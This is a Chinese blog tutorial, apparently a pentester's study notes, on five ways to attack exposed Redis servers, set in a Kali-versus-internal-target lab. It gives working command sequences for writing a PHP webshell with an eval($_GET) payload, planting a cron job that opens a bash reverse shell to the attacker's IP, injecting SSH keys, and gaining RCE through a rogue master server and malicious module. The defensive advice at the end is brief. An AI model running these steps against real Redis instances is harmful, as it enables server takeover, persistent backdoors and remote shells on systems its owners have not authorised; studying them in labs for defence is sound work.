redis 五种常见攻击方法

如果需要大佬写好的脚本,可以直接去github上面搜

参考文章:https://www.cnblogs.com/wineme/articles/11731612.html  

                 https://www.cnblogs.com/linuxsec/articles/11221756.html                               <<<<——————这篇文章是利用Gopher协议对redis进行攻击,原理都一样,只不过用的不是HTTP协议,没什么太大区别

参考的资料还有群里大佬给的笔记文件

首先先得再系统上安装redis,参考文章可以看这篇,写的很详细  https://www.cnblogs.com/hunanzp/p/12304622.html

所需要了解的知识:redis安装,shell反弹原理及命令,简单的redis语法,redis主从模式了解,crontab语法

redis一定要配置好,要不没法远程登陆写shell

 第一种攻击方法:未授权访问

如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

可以看到,成功连接上远程的redis服务器

第二种攻击方法:写入文件

条件:目标服务器开着web服务,且redis在web目录下有写入权利。master下执行。

原因:通过将redis数据库路径修改为php环境路径,将数据库名修改为php文件

 这个和和mysql日志提权一个道理

master:config set dir /var/www/html/                           //数据保存路径

master:config set dbfilename shell.php                                  //重命名

master:set payload "<?php phpinfo();?>"                       //新增数据     当然,也可以这么写   set payload "<?php eval ($_GET["cmd"]);?>"

master:save                                                                          //保存

 

 

 

 

第三种攻击方法:利用计划任务来反弹一个shell权限。

这个原理就是redis存在远程控制漏洞,如果没有设置相关的策略比如说指定Ip登录什么的,(一般redis远程登录的密码是空的,即使有也是默认的),用户就可以通过远程登录redis。首先创建一个每隔一分钟就执行一次的反弹shell的crontab任务,再把文件变更到 /var/spool/cron/(不同版本Linux系统这个文件位置不一样)目录下,为啥要变更到这个目录下呢?因为这个目录下的文件名为root的文件是被系统默认定时执行的,(你只要按固定的语法格式写进去就好,系统会自动执行的),也就是root 用户 crontab默认存放执行文件的地方,最后再把文件名改成root,系统就会默认执行root文件中的定时任务(也就是反弹shell)

首先在攻击机设立一个nc反弹接收端。

之后执行命令,将值导出,改变导出目录以及文件名

具体代码如下:

这里咱们用本地的kali和redis服务器进行测试,环境为内网环境

root@kali:~# redis-cli -h 192.168.63.130 // 开始连接靶机

192.168.63.130:6379> set x "* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1"                                      //创建一个任务计划   这个* * * * * 的意思就是,每隔一分钟就会默认执行一下后面的语句
OK
192.168.63.130:6379> config set dir /var/spool/cron/                                            // 改变导出目录
OK
192.168.63.130:6379> config set dbfilename root                                         // 改变文件名为root
OK
192.168.63.130:6379> save                                                       //保存

OK

 

crontab -l 查看root用户下的crontab任务,可以看到已经成功写入

 

 

之后linux攻击机就会接收到反弹的shell了,必须是root权限,普通用户没有权限更改用户名。

这里有个知识点——/var/spool/cron/。在linux系统中crontab是定时任务的守护进程,关于crontab命令也在  分类中的Linux类知识  里面有解释说明。我们可以使用它来定时备份文件、定时执行命令等。在kali和ubantu中,其文件位置为/var/spool/cron/crontabs/root,在centos系列中位置为/var/spool/cron/root,通常情况下没有root文件,需要自己创建

一定要注意再不同系统中,root的位置是不一样的!!!!

这里redis也可能会再最后一步命令执行也就是输入 save 的时候报错ERR,这是因为没有改root文件名权限的原因,详细过程再 分类中的Linux类知识  有解释说明

如果想真实复现漏洞的话,weblogic曾经爆出过redis 的SSRF漏洞,可以通过抓改包写入shell,控制服务器

 

第四种攻击方法: 写ssh-keygen公钥,直接登录

 

条件:redis服务使用root登录、靶机开机ssh密钥登录

(如果不了解或者忘记ssh登录的话,分类里面有对ssh的学习笔记)

 

$ ssh-keygen -t rsa

 

输入路径+文件名(回车默认)

 

输入明文密码

 

 

 

 查看生成秘钥

 

 

通过redis将其写入靶机的.ssh目录下           

 

 

 

ssh密钥远程连接

 

 

 第五种攻击方法:RCE

这里是利用redis的主从模式来进行攻击,剽自大佬博客的分享。

 slave翻译过来就是  奴隶  的意思

master 翻译过来就是主人的意思

这里简单复习一下redis的主从模式

 

 redis主机成为master,redis从机成为slave,主机可读可写,从机只能读,主机更新数据,从机会从主机获取更新的数据。

条件:能够访问远程redis端口,能够设置主从模式。

这种利攻击方式由LCBC战队队员Pavel Toporkov在zeronights 2018上介绍的redis 4.x RCE攻击。和前面几种攻击方式相比,这种攻击方式更加精细巧妙,成功率也更高。

脚本地址:https://github.com/n0b0dyCN/redis-rogue-server

使用方式:python3 redis-rogue-server.py --rhost rhost --lhost lhost     

 

 

这里来简单分析一下大佬的思路。这种利用方式首先要创建一个恶意redis服务器来作为master,该master服务器要能够回应连接他的slave 服务的响应。

[>] PING

[<] +PONG

[>] REPLCONF

[<] +OK

[>] PSYNC/SYNC

[<] +FULLRESYNC

如脚本所示,其中FULLRESYNC表示完整重同步,这一步是方便将master上的exp同步到slave上。

 

有了恶意服务器之后,先远程连接目标服务器,通过slaveof将其设置为恶意服务器的slaver。然后将dbfilename设置为exp.so。

执行slaveof命令后,主从之间要进行握手,在slaver发送PSYNC之后master回应FULLRESYNC及exp内容。大概如下:

[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$42688\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x9f\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'

master发送完exp内容后,由于主从之间采用FULLRESYNC模式,所以exp内容也会存储在slaver的数据库文件,即exp.so中。

之后在控制slaver加载模块执行即可。当然,加载完模块之后脚本也会解除主从模式、还原数据库文件。

这里脚本直接提供了shell环境。

 

在目标redis中查看模块可以看到加载了模块system。

 

当把这个模块卸载后,shell也会随之断开。

 

 

 

1.  最后总结

以上提到的这些漏洞,都是基于未授权访问。

写入shell、反弹shell、写入公钥几种漏洞都是利用redis数据存储这一点,在拥有高级权限和在某些环境配合下,将payload直接写入某个路径,从而达到我们的目的。但实际上redis用户的权限都不会太高,不太可能有人会直接以root权限运行redis或给redis以root权限。

最后一种方式利用了主从模式的完整全同步及模块加载,配合搭建的恶意服务器可以将exp同步到目标服务器上getshell。

和前面几种利用方式相比最后一种不需要太高的权限,但也是基于未授权访问这一点,所以在防护中首先要做到访问者ip限制,设置强密码,更改端口等。

 

 

 

最后感谢大佬们的分享!!!

 

posted @   链宁区块链安全服务  阅读(3180)  评论(0编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示